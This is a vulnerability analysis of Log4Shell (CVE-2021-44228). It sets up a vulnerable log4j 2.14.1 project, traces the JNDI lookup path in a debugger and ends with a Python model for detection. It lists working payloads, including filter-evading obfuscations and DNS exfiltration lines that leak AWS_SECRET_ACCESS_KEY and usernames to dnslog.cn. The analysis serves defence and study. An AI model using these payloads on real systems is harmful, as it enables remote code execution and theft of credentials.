Maven environment and test class

The test environment is a plain Maven project with log4j-core and log4j-api 2.14.1 (the last release before the CVE-2021-44228 fix), a log4j2.xml configuration, and a test class App that logs an attacker-controlled username. The pom.xml, log4j2.xml and App.java are given in full below, followed by a debugger walkthrough from the log call down to the JNDI lookup.
pom.xml:

```xml
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <groupId>top.lnng.log4j2</groupId>
  <artifactId>log4j2</artifactId>
  <version>1.0-SNAPSHOT</version>
  <packaging>jar</packaging>

  <name>log4j2</name>
  <url>http://maven.apache.org</url>

  <properties>
    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
  </properties>

  <dependencies>
    <!-- vulnerable version: message lookups are on by default -->
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.1</version>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-api</artifactId>
      <version>2.14.1</version>
    </dependency>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>

  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-compiler-plugin</artifactId>
        <configuration>
          <source>8</source>
          <target>8</target>
        </configuration>
      </plugin>
    </plugins>
  </build>
</project>
```
log4j2.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>

<configuration status="info">
  <Properties>
    <Property name="pattern1">[%-5p] %d %c - %m%n</Property>
    <Property name="pattern2">
      =========================================%n Level:%p%n Time:%d%n Class:%c%n Thread:%t%n Message:%m%n
    </Property>
    <Property name="filePath">logs/myLog.log</Property>
  </Properties>
  <appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="${pattern1}"/>
    </Console>
    <RollingFile name="RollingFile" fileName="${filePath}"
                 filePattern="logs/$${date:yyyy-MM}/app-%d{MM-dd-yyyy}-%i.log.gz">
      <PatternLayout pattern="${pattern2}"/>
      <SizeBasedTriggeringPolicy size="5 MB"/>
    </RollingFile>
  </appenders>
  <loggers>
    <root level="info">
      <appender-ref ref="Console"/>
      <appender-ref ref="RollingFile"/>
    </root>
  </loggers>
</configuration>
```
App.java (test class):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class App {
    public static void main(String[] args) {
        Logger logger = LogManager.getLogger(App.class);
        // attacker-controlled value that ends up inside a log message
        String username = "${jndi:ldap://127.0.0.1:8085/GFxElmpt}";
        logger.info("User {} login in!", username);
    }
}
```
Setting breakpoints repeatedly to locate the trigger point shows that the branch is taken when i is 7: this is the loop in MessagePatternConverter.format() that walks workingBuilder character by character looking for a `$` followed by `{`.

Stepping in: it first checks whether message lookups are enabled (the noLookups flag, which is false by default in 2.14.1 unless log4j2.formatMsgNoLookups is set, so they are), then checks whether workingBuilder contains `${`. If it does, the buffer from that point on is cut out and handed to config.getStrSubstitutor().replace().

Follow replace(): keep stepping until the real logic. Everything before substitute() is just assignment, so we only need to watch how our payload changes. A while loop in substitute() scans the buffer and extracts the content between `${` and `}`.

substitute() is then entered a second time (recursively) with a buf that no longer contains `${}`, i.e. the text that was inside the braces.

Step into resolveVariable(). resolveVariable() calls lookup() on the variable resolver (the Interpolator), which selects a lookup by the prefix before the colon; for `jndi:` that is JndiLookup, and following it the call finally lands in JndiManager.lookup().

JndiManager.lookup() delegates to this.context.lookup(). The JndiManager itself is created by JndiManagerFactory; looking at JndiManagerFactory, it creates a new InitialContext instance and returns a JndiManager wrapping it.

JndiManager is therefore the point where the lookup actually fires; from there on it is an ordinary JNDI injection problem.
- First it checks whether the content contains `${}`, then extracts what is inside the braces, which gives our malicious payload `jndi:xxx`.
- It then splits the payload on `:` and uses the prefix to decide which lookup is used to resolve it.
- Supported prefixes include date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env and log4j (the `bundle` prefix used in the last payload below is also available).
Payload variants (the first is the one used in App.java):

${jndi:ldap://127.0.0.1:8085/GFxElmpt}

Dotless-i obfuscation. `${upper:ı}` uppercases the Turkish dotless i (U+0131) to a plain `I`, so the literal string `jndi` never appears in the message, but the Interpolator lower-cases the prefix and still selects the jndi lookup. No port is given in the URL, so the JNDI (LDAP) server has to listen on 389:

${jnd${upper:ı}:ldap://[127.0.0.1]]/mESHFnWc}

The same with the character written as a Unicode escape:

${jnd${upper:\u0131}:ldap://[127.0.0.1]]/KWhsLxIC}

Nested default values (`${name:-default}` yields the default when the name cannot be resolved) combined with lower/upper, which again resolves to a `jndi:` prefix:

${${qax:-j${qax-::qax::-n}}${lower:${upper:d}}${upper:ı}:ldap://127.0.0.1:8086/mhStyxHU}

Exfiltration of environment data through DNS. The inner lookup is resolved first and becomes part of the hostname, so the data leaks via the DNS query even if the LDAP connection itself never succeeds:

${jndi:ldap://${env:USER}.dnslog.cn}
${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dnslog.cn}
${jndi:ldap://${java:version}.u2xf5m.dnslog.cn}

Reading a value from a resource bundle without any JNDI at all; the resolved value ends up in the logged message:

${bundle:application:spring.datasource.password}
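To make the resolution steps above concrete, here is a small Python model of that logic, added for this page; it is not Log4j's code (the real StrSubstitutor and Interpolator are Java and handle more cases), and the env/java/bundle values it returns are constructed stand-ins. It implements the brace matching with nesting, innermost-first substitution, the `${name:-default}` syntax and the prefix dispatch with a lower-cased prefix, and it records where Log4j would perform a live JNDI lookup instead of performing one. Feeding it the payloads from this page shows that the dotless-i and `:-` variants all normalise to the same `jndi:` lookup, which is why a WAF rule that matches the literal `jndi` is not enough: a detector has to resolve the expression first, as resolve() below does.

```python
"""Toy model of Log4j 2.14.1's StrSubstitutor / Interpolator resolution.

Added illustration for this page, not Log4j's own code. Only the behaviour the
walkthrough describes is modelled: find `${`, find the matching `}` (nested `${`
counts), substitute nested variables first, honour `${name:-default}`, then split
`prefix:key` and dispatch on the lower-cased prefix. Lookup data is constructed.
"""

# Constructed stand-in data for the lookups used by the payloads on this page.
FAKE_ENV = {"USER": "alice", "AWS_SECRET_ACCESS_KEY": "AKIA_FAKE_SECRET"}
FAKE_JAVA = {"version": "1.8.0_292"}
FAKE_BUNDLES = {"application": {"spring.datasource.password": "s3cr3t"}}

JNDI_PLACEHOLDER = "<jndi:%s>"  # substituted where Log4j would do a live JNDI lookup


def _lookup(prefix, key, jndi_targets):
    """Dispatch on the prefix like Interpolator.lookup(); None means unresolved."""
    prefix = prefix.lower()  # Interpolator lower-cases the prefix, so jndI == jndi
    if prefix == "upper":
        return key.upper()
    if prefix == "lower":
        return key.lower()
    if prefix == "env":
        return FAKE_ENV.get(key)
    if prefix == "java":
        return FAKE_JAVA.get(key)
    if prefix == "bundle":  # ResourceBundleLookup takes "bundleName:propertyKey"
        bundle, _, prop = key.partition(":")
        return FAKE_BUNDLES.get(bundle, {}).get(prop)
    if prefix == "jndi":
        # This is where JndiLookup -> JndiManager.lookup() -> InitialContext.lookup()
        # would contact the attacker's server. We only record the target.
        jndi_targets.append(key)
        return JNDI_PLACEHOLDER % key
    return None


def _resolve_variable(var, jndi_targets):
    """var is the text between ${ and } with nested variables already substituted."""
    default = None
    if ":-" in var:  # Log4j's default-value delimiter: ${name:-default}
        var, default = var.split(":-", 1)
    prefix, sep, key = var.partition(":")
    value = _lookup(prefix, key, jndi_targets) if sep else None
    if value is not None:
        return value
    if default is not None:
        return default
    return "${" + var + "}"  # unresolved variables are left in place


def substitute(text, jndi_targets):
    """Resolve every ${...} in text, innermost first (StrSubstitutor.substitute())."""
    out, i, n = [], 0, len(text)
    while i < n:
        if not text.startswith("${", i):
            out.append(text[i])
            i += 1
            continue
        depth, j = 0, i
        while j < n:  # find the matching close brace, counting nested ${
            if text.startswith("${", j):
                depth += 1
                j += 2
                continue
            if text[j] == "}":
                depth -= 1
                if depth == 0:
                    break
            j += 1
        if j >= n:  # unbalanced braces: copy the rest verbatim
            out.append(text[i:])
            break
        inner = substitute(text[i + 2:j], jndi_targets)  # nested variables first
        out.append(_resolve_variable(inner, jndi_targets))
        i = j + 1
    return "".join(out)


def resolve(message):
    """Return (resolved_message, jndi_targets) for one logged message."""
    jndi_targets = []
    return substitute(message, jndi_targets), jndi_targets


if __name__ == "__main__":
    # Constructed sample messages: the obfuscated payloads from this page.
    for msg in [
        "User ${jndi:ldap://127.0.0.1:8085/GFxElmpt} login in!",
        "${jnd${upper:\u0131}:ldap://127.0.0.1/mESHFnWc}",
        "${${qax:-j${qax-::qax::-n}}${lower:${upper:d}}${upper:\u0131}:ldap://127.0.0.1:8086/mhStyxHU}",
        "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.dnslog.cn}",
        "${bundle:application:spring.datasource.password}",
    ]:
        print(resolve(msg))
```

Note the one thing the model deliberately leaves out: Log4j 2.14.1 also runs the result of a lookup through substitution again, so a value that itself contains `${...}` is expanded one more time. A detector built on this idea should therefore loop until the output stops changing before matching on `jndi:`.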